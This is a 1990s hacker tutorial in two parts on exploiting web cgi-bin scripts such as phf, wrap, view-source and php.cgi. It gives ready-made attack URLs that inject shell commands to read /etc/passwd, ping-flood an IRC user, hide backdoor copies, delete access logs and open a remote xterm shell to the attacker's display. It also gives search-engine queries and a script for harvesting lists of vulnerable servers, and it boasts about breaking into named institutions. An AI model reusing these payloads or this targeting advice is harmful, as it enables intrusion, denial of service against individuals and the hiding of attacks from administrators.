***     Securities Hole in cgi-bin
***     memor@mygale.org - http://www.mygale.org/00/memor

***     1 - The really known phf script:

        Mostly the URL victim is really unsecure and the system admin
        doesn't know about cgi-bin security lack.
        And mostly the hackers do that hole in that way : 
        http://www.victim.com/cgi-bin/phf?Qname=a%0acat%20/etc/passwd
        but well, lots of phf are patched and more and more servers
        are now protected and well .. system admins "sometimes" know
        shadowing their passwd file and having login:x: on Query Result
        is not really fear for thoses hackers.
        By the ways.. Http commands (GET mostly) are logged in the
        /www/logs/ directory.. so when u try some hack with phf
        on the navy or some secret services.. hm.. u should use a gateway 
        before..
        Well.. Their is another uses for that script.. personnaly,
        i dont use it for reading the server passwd file due to the 
        reasons i explained before..
        You must remember that %0a escape to command shell (lf) and
        that %20 is the space.
        for example.. im on Efnet IRC and some aol lamer is annoying me
        ... i use a lame weapon for killing him.. a really lame one :
        icmp via phf..
        
        /whois AoLaMer
        *** AoLaMer is ppp125.lamer.aol.com 
        *** AoLaMer is on #Aoltalk
        *** AoLaMer is using irc.primenet.com
        *** AoLaMer is away: Lamer
        *** Notice that i used some lame mirc winblows interface.
        
        [10:01] <AoLaMer> You suck dude, im 3|1+3 cause i use AoL!
        [10:02] <memor> ok man

        i use my favorite netscrupe brownser now and i enter that url:
        http://www.victim.com/cgi-bin/phf?Qname=a%0aping%20-c%201000%20
        -s%205000%20ppp125.lamer.aol.com

        well that command will be translated for the server by 
        (translate %20 in space) a 
        ping -c 1000 -s 5000 ppp125.lamer.aol.com

        the victim server will hit that dude modem with 1000 packets 
        of 5008 bytes.. if he is really lame.. abort the current
        Contacting Server (the netscrupe wont stop to "Contacting Server"
        since the icmp is not completly done) .. so abort it.. The icmp
        will continue during that time.. and do another Query.. so
        another 1000 packets of 5008 bytes.. when i tryed to icmp with
        ping echos > 6008 bytes, the server returned -1.. well : an error.
        
        There is anothers uses.. commands in /bin that www can access
        and u can mkdir write in the www dirs..

        like (...)%20cp%20phf%20.fhp will copy phf to .fhp so the kewl
        root wont see it with a normal ls (-l) but.. hmm beware if he
        uses ls -a .. so u'll be able to call it by a 
        http://www.victim.lame.com/cgi-bin/.fhp after..
        
***     2 - Wrap Script:

        Well i'll be quick on Wrap script ... its a boggus script
        found in irix 6.2 features i know and the use is
        http://www.victim.com/cgi-bin/wrap?../../../etc/passwd
        i know that script allow only a file view.. and well on irix..
        and.. passwd files are sometimes shadowed.
        well i didnt try http://www.victim.com/cgi-bin/wrap?%0als(...)
        so.. i dont know if that script is so boggus.. i should also
        try some buffer overflow.. but same here.. i dont know if it
        works.

***     3 - View-Source Script:

        I was really proud to find that script.. i found it in 
        the florida institute of technology server..
        http://www.fit.edu after they had patched their phf by 
        "rm-ing" it and after having "rm-ed" my fhp and my .fhp  
        and my another .YouSuck ones.. They know the use of ls -a ,
        Wonderfull!! but well.. here view-source was not really
        usefull.. view-source is a "wrap" for Netscape Communicator 2.0
        features. (do a http://www.future.victim.com/cgi-bin/test-cgi)
        and well.. like wrap.. its the same way to access the passwd
        file..
        http://www.new.victim.com/cgi-bin/view-source?../../../etc/passwd
        .. on www.fit.edu their passwd file is shadowed btw.
        i tryed some
        http://www.old.victim.com/cgi-bin/view-source?%1b or %0a ..
        others %20.. but.. no work..
        the only strange thing i saw was on a %0a .. some strange Query
        Results were appearing..
        I tryed a buffer overflow of view-source but it doesnt work.
        
***     4 - php.cgi Script:

        Well i never used php.cgi script but i know that its normally
        like a wrap or a view-source... so the use is 
        http://www.victim.com/cgi-bin/php.cgi?../../../etc/passwd
        well same here.. i did heard it had a was to escape to
        command shell.. but i dont know about it. personnaly
        i use others ways (not httpd ones) for hacking servers.

***     5 - Some uses i did with phf.

        http://www.victim.com/cgi-bin/phf?Qname=a%0aping%20-c%201000%20-s
        %205000%20ip%20to%20shoot

        http://www.victim.com/cgi-bin/phf?Qname=a%0acp%20phf%20fhp

        http://www.victim.com/cgi-bin/phf?Qname=a%0acp%20phf%20.blah

        http://www.victim.com/cgi-bin/phf?Qname=a%0als%20-al%20/dir/to/go

        http://www.victim.com/cgi-bin/phf?Qname=a%0amkdir%20/www/dirtocreate

        http://www.victim.com/cgi-bin/phf?Qname=a%0arm%20../logs/access_log

***     6 - But remember:

        The httpd access are logged in the logs dirs of the www directory.
        so.. hmm dont try to hack some "High Security" server with that..
        well for me i hacked one time a "hot" server.. National
        Supercomputing Center for Energy and Environnement (www.nscee.edu)
        .. the next day.. all was patched and all the passwd file i got
        and decrypted was.. disabled .. :*:



  More on cgi-bin holes - by ]NiCK[

1 - The largest server database helps exploit phf
*************************************************

     I have appointed: ALTA-VISTA ! :) yeah ! if you know the syntax of
     this websearch well enough, you can succeed to have a list of more
     than 3000 insecure servers with this method, simply by typing:

     http://altavista.digital.com/cgi-bin/query?pg=aq&what=web&fmt=.
     &q=link%3A%22%2Fcgi-bin%2Fphf%22&r=&d0=&d1=
     (type this all in on one line)

     Too easy! Isn't it? Also, you can modify it to search for php.cgi,
     webgais, or others such as view-source...
     
 Note:  Sometimes, some servers won't work... but its just because the
        database isn't updated every day.


2 - Other stuff to exploit websearchs
*************************************

     I love the "Yellow Pages" of organizations, enterprises, or companies
     like for instance Adminnet (www.adminet.com)... its filled with kewl
     insecure web servers.. But the problem is that it's not very
     interesting to scan manually... So, I wrote a little program to change
     the html index of web servers into a list of exploitable servers for
     phfscan or phpscan...

     Here is a little unix script:

--
if [ $# = 0 ]
then
echo "Usage: html2list file.html" >&2
exit 1
cat $1 | grep '"http://' | tr '"' '\n' | grep '^http://' | cut -c8- |tr '/'
'\n' |grep '\.' | grep -vi '\.html\|\.htm' |sort -u > $1.list
        (one again, the last 2 lines need to be moved up together)
--

 Note:  You can change/update it to a better way of scanning...


3 - Xterm with phf
******************

     Cracking the /etc/passwd ! ok... but there are better things to do
     than waste your time. This attack consists of using Xterm with phf.
     So, of course Xwindows must be present on the victim server, and you
     must also be running it. While in Xwindows, write this: 'xhost
     +www.victim.com' This is so your machine will accept connections
     from victim.com... You can simply type 'xhost +', but it isn't really
     secure... After, you must know what os www.victim.com is running,
     so you can guess the path of Xterm.
     
     Here are some default Xterm paths for a few systems:
     
   AIX  : /usr/bin/X11/xterm
   HP-UX: /usr/bin/X11/hpterm
   Linux: /usr/X11R6/bin/xterm
   SunOS: /usr/openwin/bin/xterm

     You can also use: 'find /usr -name xterm' or again 'whereis xterm' if
     you have a shell on the machine.

     Finally, once you have found the path, you can run xterm via phf like:

     http://www.victim.com/cgi-bin/phf?Qname=a%0a/usr/openwin/bin/
     xterm%20-display%20your.ip.com:0    (combine these two lines)

     Wait a few seconds... and whoop, a shell from the victims server will
     appear in your Xwindow. :) Usually you become an user Nobody, but
     sometimes, if the http daemon runs in a root shell, your become root,
     or www sometimes.. The best thing is that your access is not logged
     in the lastlog or wtmp... Very clean exploit !

Have PHFun ! :)


-]NiCK[ <Modul1@usa.net>
